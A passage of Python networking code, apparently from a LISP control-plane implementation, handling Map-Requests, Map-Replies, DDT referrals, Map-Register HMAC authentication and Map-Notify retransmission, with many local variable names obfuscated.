    lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
    return
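
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply (empty locator-set) for an EID-prefix, or a
# Map-Notify ack when the request carried a subscription.
#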
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
    xtr_id, pubsub):

    lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}".format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
        red(dest.print_address(), False)))

    action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
        LISP_DROP_ACTION

    #
    # For EID-crypto-hash EIDs, tell the requester to send a Map-Request.
    #
    if (lisp_get_eid_hash(eid) != None):
        action = LISP_SEND_MAP_REQUEST_ACTION

    packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, None,
        None, False, False)

    #
    # Subscription requests get a Map-Notify ack instead of a Map-Reply.
    #
    if (pubsub):
        lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
            xtr_id)
    else:
        lisp_send_map_reply(sockets, packet, dest, port)
    return
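
#
# lisp_retransmit_ddt_map_request
#
# Retransmission timer handler for a queued DDT Map-Request.
#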
def lisp_retransmit_ddt_map_request(mr):
    source_str = mr.mr_source.print_address()
    eid_str = mr.print_eid_tuple()
    nonce = mr.nonce

    #
    # Count the non-response against the referral-node queried last.
    #
    if (mr.last_request_sent_to):
        addr_str = mr.last_request_sent_to.print_address()
        referral = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
            mr.last_cached_prefix[1], True)
        if (referral and referral.referral_set.has_key(addr_str)):
            referral.referral_set[addr_str].no_responses += 1

    #
    # Give up after the retry limit and dequeue the request.
    #
    if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}".format(green(eid_str, False), lisp_hex_string(nonce)))
        mr.dequeue_map_request()
        return

    mr.retry_count += 1

    s = green(source_str, False)
    d = green(eid_str, False)
    lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}".format(bold("Map-Request", False), "P" if mr.from_pitr else "",
        red(mr.itr.print_address(), False), s, d, lisp_hex_string(nonce)))

    lisp_send_ddt_map_request(mr, False)

    #
    # Restart the retransmission timer.
    #
    mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
        lisp_retransmit_ddt_map_request, [mr])
    mr.retransmit_timer.start()
    return
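
#
# lisp_get_referral_node
#
# Select a referral-node that is up and has the best (lowest) priority,
# load-splitting among equal-priority nodes by hashing the source and
# destination EIDs.
#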
def lisp_get_referral_node(referral, source_eid, dest_eid):
    #
    # Collect the up referral-nodes with the best priority.
    #
    ref_set = []
    for ref_node in referral.referral_set.values():
        if (ref_node.updown == False): continue
        if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
            ref_set.append(ref_node)
        elif (ref_set[0].priority > ref_node.priority):
            ref_set = []
            ref_set.append(ref_node)

    count = len(ref_set)
    if (count == 0): return(None)

    hashval = dest_eid.hash_address(source_eid)
    hashval = hashval % count
    return(ref_set[hashval])
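
#
# lisp_send_ddt_map_request
#
# Look up the referral cache (or the DDT root) and ECM-forward the queued
# Map-Request to a referral-node.
#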
def lisp_send_ddt_map_request(mr, send_to_root):
    lisp_sockets = mr.lisp_sockets
    nonce = mr.nonce
    itr = mr.itr
    mr_source = mr.mr_source
    eid_str = mr.print_eid_tuple()

    #
    # Give up after 8 transmission attempts.
    #
    if (mr.send_count == 8):
        lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format(
            green(eid_str, False), lisp_hex_string(nonce)))
        mr.dequeue_map_request()
        return

    #
    # Look up the root (when retrying wider) or the requested EID.
    #
    if (send_to_root):
        lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        mr.tried_root = True
        lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
    else:
        lookup_eid = mr.eid
        lookup_group = mr.group

    referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
    if (referral == None):
        lprint("No referral cache entry found")
        lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
            nonce, itr, mr.sport, 15, None, False)
        return

    referral_str = referral.print_eid_tuple()
    lprint("Found referral cache entry {}, referral-type: {}".format(
        referral_str, referral.print_referral_type()))

    ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
    if (ref_node == None):
        lprint("No reachable referral-nodes found")
        mr.dequeue_map_request()
        lisp_send_negative_map_reply(lisp_sockets, referral.eid,
            referral.group, nonce, itr, mr.sport, 1, None, False)
        return

    lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}".format(
        ref_node.referral_address.print_address(),
        referral.print_referral_type(), green(eid_str, False),
        lisp_hex_string(nonce)))

    #
    # ECM-encapsulate the Map-Request toward the selected referral-node.
    #
    to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
        referral.referral_type == LISP_DDT_ACTION_MS_ACK)
    lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
        ref_node.referral_address, to_ms=to_ms, ddt=True)

    #
    # Record where and when we sent it for retransmission accounting.
    #
    mr.last_request_sent_to = ref_node.referral_address
    mr.last_sent = lisp_get_timestamp()
    mr.send_count += 1
    ref_node.map_requests_sent += 1
    return
if 41 - 41: ooOoO0o % i11iIiiIii
if 69 - 69: IiII - oO0o
if 21 - 21: Oo0Ooo / I1Ii111
if 72 - 72: OoOoOO00 . i11iIiiIii
if 25 - 25: i1IIi
if 69 - 69: OOooOOo / Ii1I
if 67 - 67: i11iIiiIii . II111iiii + OoooooooOO % o0oOOo0O0Ooo + IiII * i1IIi
if 53 - 53: oO0o * OoooooooOO + II111iiii . IiII * I1ii11iIi11i
#
# lisp_mr_process_map_request
#
# Map-Resolver processing of a Map-Request received from an (P)ITR.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
    sport, mr_source):

    ooOOoo0 = map_request.target_eid
    IIi1iiIII11 = map_request.target_group
    O0i1111ii1 = map_request.print_eid_tuple()
    I1IIiiiI1I1iiIii = mr_source.print_address()
    Iii11I = map_request.nonce

    IiII1iiI = green(I1IIiiiI1I1iiIii, False)
    OooOOOoOoo0O0 = green(O0i1111ii1, False)
    lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}".format(
        "P" if map_request.pitr_bit else "",
        red(ecm_source.print_address(), False), IiII1iiI, OooOOOoOoo0O0,
        lisp_hex_string(Iii11I)))

    #
    # Queue the Map-Request so it can be retransmitted until answered.
    #
    I1I1iiii111II = lisp_ddt_map_request(lisp_sockets, packet, ooOOoo0,
        IIi1iiIII11, Iii11I)
    I1I1iiii111II.packet = packet
    I1I1iiii111II.itr = ecm_source
    I1I1iiii111II.mr_source = mr_source
    I1I1iiii111II.sport = sport
    I1I1iiii111II.from_pitr = map_request.pitr_bit
    I1I1iiii111II.queue_map_request()

    lisp_send_ddt_map_request(I1I1iiii111II, False)
    return

#
# lisp_process_map_request
#
# Dispatch a received Map-Request based on what this node is configured
# to be (ETR, Map-Server, Map-Resolver, DDT-node).
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
    mr_source, mr_port, ddt_request, ttl, timestamp):

    OoO = packet
    o0OOo0 = lisp_map_request()
    packet = o0OOo0.decode(packet, mr_source, mr_port)
    if (packet == None):
        lprint("Could not decode Map-Request packet")
        return

    o0OOo0.print_map_request()

    #
    # RLOC-probe requests take a separate processing path.
    #
    if (o0OOo0.rloc_probe):
        lisp_process_rloc_probe_request(lisp_sockets, o0OOo0, mr_source,
            mr_port, ttl, timestamp)
        return

    #
    # Solicit-Map-Request processing.
    #
    if (o0OOo0.smr_bit):
        lisp_process_smr(o0OOo0)

    if (o0OOo0.smr_invoked_bit):
        lisp_process_smr_invoked_request(o0OOo0)

    #
    # An ETR answers Map-Requests for its own registered EIDs.
    #
    if (lisp_i_am_etr):
        lisp_etr_process_map_request(lisp_sockets, o0OOo0, mr_source,
            mr_port, ttl, timestamp)

    #
    # A Map-Server answers (or forwards) on behalf of registered sites.
    #
    if (lisp_i_am_ms):
        packet = OoO
        ooOOoo0, IIi1iiIII11, O0ooOo0O0ooo0 = lisp_ms_process_map_request(
            lisp_sockets, OoO, o0OOo0, mr_source, mr_port, ecm_source)
        if (ddt_request):
            lisp_ms_send_map_referral(lisp_sockets, o0OOo0, ecm_source,
                ecm_port, O0ooOo0O0ooo0, ooOOoo0, IIi1iiIII11)
        return

    #
    # A Map-Resolver walks the DDT hierarchy for the requester.
    #
    if (lisp_i_am_mr and not ddt_request):
        lisp_mr_process_map_request(lisp_sockets, OoO, o0OOo0,
            ecm_source, mr_port, mr_source)

    #
    # A DDT-node returns Map-Referrals.
    #
    if (lisp_i_am_ddt or ddt_request):
        packet = OoO
        lisp_ddt_process_map_request(lisp_sockets, o0OOo0, ecm_source,
            ecm_port)
    return

#
# lisp_store_mr_stats
#
# Record negative Map-Reply statistics and RTT for a Map-Resolver.
#
def lisp_store_mr_stats(source, nonce):
    I1I1iiii111II = lisp_get_map_resolver(source, None)
    if (I1I1iiii111II == None): return

    #
    # Count negative Map-Replies received from this Map-Resolver.
    #
    I1I1iiii111II.neg_map_replies_received += 1
    I1I1iiii111II.last_reply = lisp_get_timestamp()

    #
    # Reset the running RTT total every 100 replies.
    #
    if ((I1I1iiii111II.neg_map_replies_received % 100) == 0):
        I1I1iiii111II.total_rtt = 0

    #
    # If the nonce matches the outstanding request, accumulate the RTT.
    #
    if (I1I1iiii111II.last_nonce == nonce):
        I1I1iiii111II.total_rtt += (time.time() - I1I1iiii111II.last_used)
        I1I1iiii111II.last_nonce = 0

    if ((I1I1iiii111II.neg_map_replies_received % 10) == 0):
        I1I1iiii111II.last_nonce = 0
    return

#
# lisp_process_map_reply
#
# Process a received Map-Reply and add or replace map-cache state for
# each EID-record it carries.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl, itr_in_ts):
    global lisp_map_cache

    oO00OoO0O0O = lisp_map_reply()
    packet = oO00OoO0O0O.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Reply packet")
        return

    oO00OoO0O0O.print_map_reply()

    #
    # Process each EID-record in the Map-Reply.
    #
    I1ooO00000OOoO = None
    for IiIIi1IiiIiI in range(oO00OoO0O0O.record_count):
        i111iII = lisp_eid_record()
        packet = i111iII.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Reply packet")
            return
        i111iII.print_record("  ", False)

        #
        # A record with no RLOCs is a negative Map-Reply; account for it
        # in the Map-Resolver statistics.
        #
        if (i111iII.rloc_count == 0):
            lisp_store_mr_stats(source, oO00OoO0O0O.nonce)

        o0oO0O00 = (i111iII.group.is_null() == False)

        if (lisp_decent_push_configured):
            I11I1iI = i111iII.action
            if (o0oO0O00 and I11I1iI == LISP_DROP_ACTION):
                if (i111iII.eid.is_local()): continue

        if (o0oO0O00 == False and i111iII.eid.is_null()): continue

        #
        # Look up an existing map-cache entry for this EID (or group).
        #
        if (o0oO0O00):
            o0o000Oo = lisp_map_cache_lookup(i111iII.eid, i111iII.group)
        else:
            o0o000Oo = lisp_map_cache.lookup_cache(i111iII.eid, True)

        O00Oo = (o0o000Oo == None)

        #
        # Never overwrite gleaned map-cache state with Map-Reply state.
        #
        if (o0o000Oo == None):
            o0O0o0O, O0O, IIIi1i1iIIIi = lisp_allow_gleaning(i111iII.eid,
                i111iII.group, None)
            if (o0O0o0O): continue
        else:
            if (o0o000Oo.gleaned): continue

        #
        # Decode each RLOC-record into an rloc-set for the map-cache.
        #
        OoO0oOOooOO = []
        Oo0O00000o0OO = None
        for OO00O0O in range(i111iII.rloc_count):
            I1Ii11iI = lisp_rloc_record()
            I1Ii11iI.keys = oO00OoO0O0O.keys
            packet = I1Ii11iI.decode(packet, oO00OoO0O0O.nonce)
            if (packet == None):
                lprint("Could not decode RLOC-record in Map-Reply packet")
                return
            I1Ii11iI.print_record("    ")

            OoOO0O = None
            if (o0o000Oo): OoOO0O = o0o000Oo.get_rloc(I1Ii11iI.rloc)
            if (OoOO0O):
                I1IIiIIIii = OoOO0O
            else:
                I1IIiIIIii = lisp_rloc()

            #
            # Store state from the RLOC-record, including security keys.
            #
            Oo0O00O = I1IIiIIIii.store_rloc_from_record(I1Ii11iI,
                oO00OoO0O0O.nonce, source)
            I1IIiIIIii.echo_nonce_capable = oO00OoO0O0O.echo_nonce_capable

            if (I1IIiIIIii.echo_nonce_capable):
                oo0o00OO = I1IIiIIIii.rloc.print_address_no_iid()
                if (lisp_get_echo_nonce(None, oo0o00OO) == None):
                    lisp_echo_nonce(oo0o00OO)

            #
            # Pass timestamps through JSON telemetry RLOC-records.
            #
            if (I1IIiIIIii.json):
                if (lisp_is_json_telemetry(I1IIiIIIii.json.json_string)):
                    iii1Iii1 = I1IIiIIIii.json.json_string
                    iii1Iii1 = lisp_encode_telemetry(iii1Iii1, ii=itr_in_ts)
                    I1IIiIIIii.json.json_string = iii1Iii1

            #
            # Process an RLOC-probe reply when address-families match.
            #
            if (oO00OoO0O0O.rloc_probe and I1Ii11iI.probe_bit):
                if (I1IIiIIIii.rloc.afi == source.afi):
                    lisp_process_rloc_probe_reply(I1IIiIIIii, source, Oo0O00O,
                        oO00OoO0O0O, ttl, Oo0O00000o0OO)
                if (I1IIiIIIii.rloc.is_multicast_address()):
                    Oo0O00000o0OO = I1IIiIIIii

            OoO0oOOooOO.append(I1IIiIIIii)

            if (lisp_data_plane_security and I1IIiIIIii.rloc_recent_rekey()):
                I1ooO00000OOoO = I1IIiIIIii

        #
        # With NAT-traversal, prefer private RLOCs, and keep only the RTR
        # RLOCs when we are an ITR (or only the non-RTR RLOCs when we are
        # the RTR).
        #
        if (oO00OoO0O0O.rloc_probe == False and lisp_nat_traversal):
            iioo00oOOO00 = []
            i1ii1iiI1iI1 = []
            for I1IIiIIIii in OoO0oOOooOO:
                if (I1IIiIIIii.rloc.is_private_address()):
                    I1IIiIIIii.priority = 1
                    I1IIiIIIii.state = LISP_RLOC_UNREACH_STATE
                    iioo00oOOO00.append(I1IIiIIIii)
                    i1ii1iiI1iI1.append(
                        I1IIiIIIii.rloc.print_address_no_iid())
                    continue

                if (I1IIiIIIii.priority == 254 and lisp_i_am_rtr == False):
                    iioo00oOOO00.append(I1IIiIIIii)
                    i1ii1iiI1iI1.append(
                        I1IIiIIIii.rloc.print_address_no_iid())

                if (I1IIiIIIii.priority != 254 and lisp_i_am_rtr):
                    iioo00oOOO00.append(I1IIiIIIii)
                    i1ii1iiI1iI1.append(
                        I1IIiIIIii.rloc.print_address_no_iid())

            if (i1ii1iiI1iI1 != []):
                OoO0oOOooOO = iioo00oOOO00
                lprint("NAT-traversal optimized RLOC-set: {}".format(
                    i1ii1iiI1iI1))

        #
        # Prune RLOC-records that carry JSON instead of an address.
        #
        iioo00oOOO00 = []
        for I1IIiIIIii in OoO0oOOooOO:
            if (I1IIiIIIii.json != None): continue
            iioo00oOOO00.append(I1IIiIIIii)

        if (iioo00oOOO00 != []):
            I1I1 = len(OoO0oOOooOO) - len(iioo00oOOO00)
            lprint("Pruning {} no-address RLOC-records for map-cache".format(
                I1I1))
            OoO0oOOooOO = iioo00oOOO00

        #
        # For an RLOC-probe reply, keep the existing map-cache rloc-set.
        #
        if (oO00OoO0O0O.rloc_probe and o0o000Oo != None):
            OoO0oOOooOO = o0o000Oo.rloc_set

        #
        # If the rloc-set changed, take the old RLOCs off the probe list.
        #
        I1i1I1I = O00Oo
        if (o0o000Oo and OoO0oOOooOO != o0o000Oo.rloc_set):
            o0o000Oo.delete_rlocs_from_rloc_probe_list()
            I1i1I1I = True

        #
        # Add a new map-cache entry or replace the rloc-set of an
        # existing one.
        #
        o0o00 = o0o000Oo.uptime if (o0o000Oo) else None
        if (o0o000Oo == None):
            o0o000Oo = lisp_mapping(i111iII.eid, i111iII.group, OoO0oOOooOO)
            o0o000Oo.mapping_source = source

        if (lisp_i_am_rtr and i111iII.group.is_null() == False):
            o0o000Oo.map_cache_ttl = LISP_MCAST_TTL
        else:
            o0o000Oo.map_cache_ttl = i111iII.store_ttl()

        o0o000Oo.action = i111iII.action
        o0o000Oo.add_cache(I1i1I1I)

        iI1I11II = "Add"
        if (o0o00):
            o0o000Oo.uptime = o0o00
            o0o000Oo.refresh_time = lisp_get_timestamp()
            iI1I11II = "Replace"

        lprint("{} {} map-cache with {} RLOCs".format(iI1I11II,
            green(o0o000Oo.print_eid_tuple(), False), len(OoO0oOOooOO)))

        #
        # Tell the external data-plane about rekeyed RLOCs.
        #
        if (lisp_ipc_dp_socket and I1ooO00000OOoO != None):
            lisp_write_ipc_keys(I1ooO00000OOoO)

        #
        # For a brand new map-cache entry, trigger RLOC-probes right away.
        #
        if (O00Oo):
            oO0oo000O = bold("RLOC-probe", False)
            for I1IIiIIIii in o0o000Oo.best_rloc_set:
                oo0o00OO = red(I1IIiIIIii.rloc.print_address_no_iid(), False)
                lprint("Trigger {} to {}".format(oO0oo000O, oo0o00OO))
                lisp_send_map_request(lisp_sockets, 0, o0o000Oo.eid,
                    o0o000Oo.group, I1IIiIIIii)
    return

#
# lisp_compute_auth
#
# Compute the authentication hash for a Map-Register and encode it into
# the packet.
#
def lisp_compute_auth(packet, map_register, password):
    if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)

    #
    # Hash the packet with the authentication field zeroed out.
    #
    packet = map_register.zero_auth(packet)
    IIi1iiIIi1i = lisp_hash_me(packet, map_register.alg_id, password, False)

    map_register.auth_data = IIi1iiIIi1i
    packet = map_register.encode_auth(packet)
    return(packet)

#
# lisp_hash_me
#
# Run the configured HMAC algorithm over a packet buffer.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
    if (alg_id == LISP_NONE_ALG_ID): return(True)

    if (alg_id == LISP_SHA_1_96_ALG_ID):
        I1iiiII1i1 = hashlib.sha1
    if (alg_id == LISP_SHA_256_128_ALG_ID):
        I1iiiII1i1 = hashlib.sha256

    if (do_hex):
        IIi1iiIIi1i = hmac.new(password, packet, I1iiiII1i1).hexdigest()
    else:
        IIi1iiIIi1i = hmac.new(password, packet, I1iiiII1i1).digest()
    return(IIi1iiIIi1i)

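#
# Illustrative sketch, not part of the protocol path: lisp_compute_auth()
# and lisp_verify_auth() are symmetric users of lisp_hash_me(). The sender
# embeds the binary digest (do_hex=False) and the receiver compares hex
# digests (do_hex=True), roughly as follows with hypothetical inputs:
#
def _example_hmac_round_trip(packet, password):
    import binascii, hashlib, hmac

    # Sender side: binary digest that would be embedded in the packet.
    sent = hmac.new(password, packet, hashlib.sha256).digest()

    # Receiver side: hex digest compared against the received auth-data.
    received = hmac.new(password, packet, hashlib.sha256).hexdigest()
    return(binascii.hexlify(sent) == received)
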
#
# lisp_verify_auth
#
# Verify the authentication data in a received packet.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
    if (alg_id == LISP_NONE_ALG_ID): return(True)

    IIi1iiIIi1i = lisp_hash_me(packet, alg_id, password, True)
    o00Oo = (IIi1iiIIi1i == auth_data)

    if (o00Oo == False):
        lprint("Hashed value: {} does not match packet value: {}".format(
            IIi1iiIIi1i, auth_data))
    return(o00Oo)

#
# lisp_retransmit_map_notify
#
# Retransmit a queued Map-Notify until it is acked or the retry limit
# is reached.
#
def lisp_retransmit_map_notify(map_notify):
    oo0OoO = map_notify.etr
    Oo0O00O = map_notify.etr_port

    #
    # After the retry limit, dequeue the Map-Notify and stop the timer.
    #
    if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}".format(
            map_notify.nonce_key, red(oo0OoO.print_address(), False)))

        Oo000O000 = map_notify.nonce_key
        if (lisp_map_notify_queue.has_key(Oo000O000)):
            map_notify.retransmit_timer.cancel()
            lprint("Dequeue Map-Notify from retransmit queue, key is: {}".format(
                Oo000O000))
            try:
                lisp_map_notify_queue.pop(Oo000O000)
            except:
                lprint("Key not found in Map-Notify queue")
        return

    IiIiI = map_notify.lisp_sockets
    map_notify.retry_count += 1

    lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format(
        bold("Map-Notify", False), map_notify.nonce_key,
        red(oo0OoO.print_address(), False), map_notify.retry_count))

    lisp_send_map_notify(IiIiI, map_notify.packet, oo0OoO, Oo0O00O)
    if (map_notify.site): map_notify.site.map_notifies_sent += 1

    #
    # Rearm the timer for the next retry.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return

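#
# Illustrative sketch with a hypothetical message dict: the Map-Notify
# retransmit machinery above is a self-rearming threading.Timer that
# stops at a retry limit. Minimal form of the pattern:
#
def _example_rearming_timer(message, interval, max_retries):
    import threading

    if (message["retries"] == max_retries): return
    message["retries"] += 1

    # Re-arm: each firing schedules the next attempt.
    timer = threading.Timer(interval, _example_rearming_timer,
        [message, interval, max_retries])
    timer.start()
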
#
# lisp_send_merged_map_notify
#
# Send a merged Map-Notify to each ETR of a multi-homed registration.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
    eid_record):

    #
    # Encode the merged EID-record with the full registered rloc-set.
    #
    eid_record.rloc_count = len(parent.registered_rlocs)
    iIiIi1IiiiI1 = eid_record.encode()
    eid_record.print_record("Merged Map-Notify ", False)

    for iI11IiI1 in parent.registered_rlocs:
        I1Ii11iI = lisp_rloc_record()
        I1Ii11iI.store_rloc_entry(iI11IiI1)
        iIiIi1IiiiI1 += I1Ii11iI.encode()
        I1Ii11iI.print_record("  ")
        del(I1Ii11iI)

    #
    # Unicast a Map-Notify to each registering ETR.
    #
    for iI11IiI1 in parent.registered_rlocs:
        oo0OoO = iI11IiI1.rloc
        Ii1ii1 = lisp_map_notify(lisp_sockets)
        Ii1ii1.record_count = 1
        I1I1I1 = map_register.key_id
        Ii1ii1.key_id = I1I1I1
        Ii1ii1.alg_id = map_register.alg_id
        Ii1ii1.auth_len = map_register.auth_len
        Ii1ii1.nonce = map_register.nonce
        Ii1ii1.nonce_key = lisp_hex_string(Ii1ii1.nonce)
        Ii1ii1.etr.copy_address(oo0OoO)
        Ii1ii1.etr_port = map_register.sport
        Ii1ii1.site = parent.site
        IiiiIi1iiii11 = Ii1ii1.encode(iIiIi1IiiiI1,
            parent.site.auth_key[I1I1I1])
        Ii1ii1.print_notify()

        #
        # Replace any pending Map-Notify queued for the same nonce.
        #
        Oo000O000 = Ii1ii1.nonce_key
        if (lisp_map_notify_queue.has_key(Oo000O000)):
            oOoO0O0O0O0 = lisp_map_notify_queue[Oo000O000]
            oOoO0O0O0O0.retransmit_timer.cancel()
            del(oOoO0O0O0O0)
        lisp_map_notify_queue[Oo000O000] = Ii1ii1

        lprint("Send merged Map-Notify to ETR {}".format(
            red(oo0OoO.print_address(), False)))

        lisp_send(lisp_sockets, oo0OoO, LISP_CTRL_PORT, IiiiIi1iiii11)
        parent.site.map_notifies_sent += 1

        Ii1ii1.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
            lisp_retransmit_map_notify, [Ii1ii1])
        Ii1ii1.retransmit_timer.start()
    return

#
# lisp_build_map_notify
#
# Build and send a Map-Notify, queueing it for retransmission when it is
# not just acking a Map-Register.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
    source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):

    Oo000O000 = lisp_hex_string(nonce) + source.print_address()

    #
    # Suppress this Map-Notify if one is already pending for the same EIDs.
    #
    lisp_remove_eid_from_map_notify_queue(eid_list)
    if (lisp_map_notify_queue.has_key(Oo000O000)):
        Ii1ii1 = lisp_map_notify_queue[Oo000O000]
        IiII1iiI = red(source.print_address_no_iid(), False)
        lprint("Map-Notify with nonce 0x{} pending for xTR {}".format(
            lisp_hex_string(Ii1ii1.nonce), IiII1iiI))
        return

    Ii1ii1 = lisp_map_notify(lisp_sockets)
    Ii1ii1.record_count = record_count
    Ii1ii1.key_id = key_id
    Ii1ii1.alg_id = alg_id
    Ii1ii1.auth_len = auth_len
    Ii1ii1.nonce = nonce
    Ii1ii1.nonce_key = lisp_hex_string(nonce)
    Ii1ii1.etr.copy_address(source)
    Ii1ii1.etr_port = port
    Ii1ii1.site = site
    Ii1ii1.eid_list = eid_list

    #
    # Only unsolicited Map-Notifies are queued for retransmission.
    #
    if (map_register_ack == False):
        Oo000O000 = Ii1ii1.nonce_key
        lisp_map_notify_queue[Oo000O000] = Ii1ii1

    if (map_register_ack):
        lprint("Send Map-Notify to ack Map-Register")
    else:
        lprint("Send Map-Notify for RLOC-set change")

    IiiiIi1iiii11 = Ii1ii1.encode(eid_records, site.auth_key[key_id])
    Ii1ii1.print_notify()

    if (map_register_ack == False):
        i111iII = lisp_eid_record()
        i111iII.decode(eid_records)
        i111iII.print_record("  ", False)

    lisp_send_map_notify(lisp_sockets, IiiiIi1iiii11, Ii1ii1.etr, port)
    site.map_notifies_sent += 1

    if (map_register_ack): return

    #
    # Arm retransmission for the unsolicited case.
    #
    Ii1ii1.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [Ii1ii1])
    Ii1ii1.retransmit_timer.start()
    return

#
# lisp_send_map_notify_ack
#
# Send a Map-Notify-Ack back to a Map-Server.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
    map_notify.map_notify_ack = True

    IiiiIi1iiii11 = map_notify.encode(eid_records, ms.password)
    map_notify.print_notify()

    oo0OoO = ms.map_server
    lprint("Send Map-Notify-Ack to {}".format(
        red(oo0OoO.print_address(), False)))
    lisp_send(lisp_sockets, oo0OoO, LISP_CTRL_PORT, IiiiIi1iiii11)
    return

#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify for a multicast (S,G) registration to an xTR.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):

    Ii1ii1 = lisp_map_notify(lisp_sockets)
    Ii1ii1.record_count = 1
    Ii1ii1.nonce = lisp_get_control_nonce()
    Ii1ii1.nonce_key = lisp_hex_string(Ii1ii1.nonce)
    Ii1ii1.etr.copy_address(xtr)
    Ii1ii1.etr_port = LISP_CTRL_PORT
    Ii1ii1.eid_list = eid_list
    Oo000O000 = Ii1ii1.nonce_key

    #
    # Suppress this Map-Notify if one is already pending for the same EIDs.
    #
    lisp_remove_eid_from_map_notify_queue(Ii1ii1.eid_list)
    if (lisp_map_notify_queue.has_key(Oo000O000)):
        Ii1ii1 = lisp_map_notify_queue[Oo000O000]
        lprint("Map-Notify with nonce 0x{} pending for ITR {}".format(
            Ii1ii1.nonce, red(xtr.print_address_no_iid(), False)))
        return

    lisp_map_notify_queue[Oo000O000] = Ii1ii1

    #
    # Decide whether to advertise the RTR-set or the real rloc-set.
    #
    ooo0O0OO = site_eid.rtrs_in_rloc_set()
    if (ooo0O0OO):
        if (site_eid.is_rtr_in_rloc_set(xtr)): ooo0O0OO = False

    #
    # Build the EID-record, counting only the RLOCs that will be sent.
    #
    i111iII = lisp_eid_record()
    i111iII.record_ttl = 1440
    i111iII.eid.copy_address(site_eid.eid)
    i111iII.group.copy_address(site_eid.group)
    i111iII.rloc_count = 0
    for i1III111 in site_eid.registered_rlocs:
        if (ooo0O0OO ^ i1III111.is_rtr()): continue
        i111iII.rloc_count += 1
    IiiiIi1iiii11 = i111iII.encode()

    Ii1ii1.print_notify()
    i111iII.print_record("  ", False)

    #
    # Append the selected RLOC-records.
    #
    for i1III111 in site_eid.registered_rlocs:
        if (ooo0O0OO ^ i1III111.is_rtr()): continue
        I1Ii11iI = lisp_rloc_record()
        I1Ii11iI.store_rloc_entry(i1III111)
        IiiiIi1iiii11 += I1Ii11iI.encode()
        I1Ii11iI.print_record("    ")

    IiiiIi1iiii11 = Ii1ii1.encode(IiiiIi1iiii11, "")
    if (IiiiIi1iiii11 == None): return

    lisp_send_map_notify(lisp_sockets, IiiiIi1iiii11, xtr, LISP_CTRL_PORT)

    #
    # Arm retransmission.
    #
    Ii1ii1.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [Ii1ii1])
    Ii1ii1.retransmit_timer.start()
    return

#
# lisp_queue_multicast_map_notify
#
# Send Map-Notifies to the ITRs/RTRs affected by an RLE change.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
    Oo00oO0 = lisp_address(LISP_AFI_NONE, "", 0, 0)

    for oOOooo000OoO in rle_list:
        IiIIiIII1I1i = lisp_site_eid_lookup(oOOooo000OoO[0], oOOooo000OoO[1],
            True)
        if (IiIIiIII1I1i == None): continue

        #
        # If the merged registration has no RLOCs, collect the RTRs from
        # the individual registrations.
        #
        I1iiiII1Ii1i1 = IiIIiIII1I1i.registered_rlocs
        if (len(I1iiiII1Ii1i1) == 0):
            iII1iI1IIiii = {}
            for iIiIi1I in IiIIiIII1I1i.individual_registrations.values():
                for i1III111 in iIiIi1I.registered_rlocs:
                    if (i1III111.is_rtr() == False): continue
                    iII1iI1IIiii[i1III111.rloc.print_address()] = i1III111
            I1iiiII1Ii1i1 = iII1iI1IIiii.values()

        #
        # Decide which xTRs get the Map-Notify. For the (0.0.0.0/0, G)
        # entry, notify the existing RLE-nodes; otherwise notify RTRs.
        #
        OOooOo00Ooo = []
        o00O0o0O0O0o = False
        if (IiIIiIII1I1i.eid.address == 0 and IiIIiIII1I1i.eid.mask_len == 0):
            o0ooOO0OOO00O0 = []
            II11Ii1i1iiII = []
            if (len(I1iiiII1Ii1i1) != 0 and I1iiiII1Ii1i1[0].rle != None):
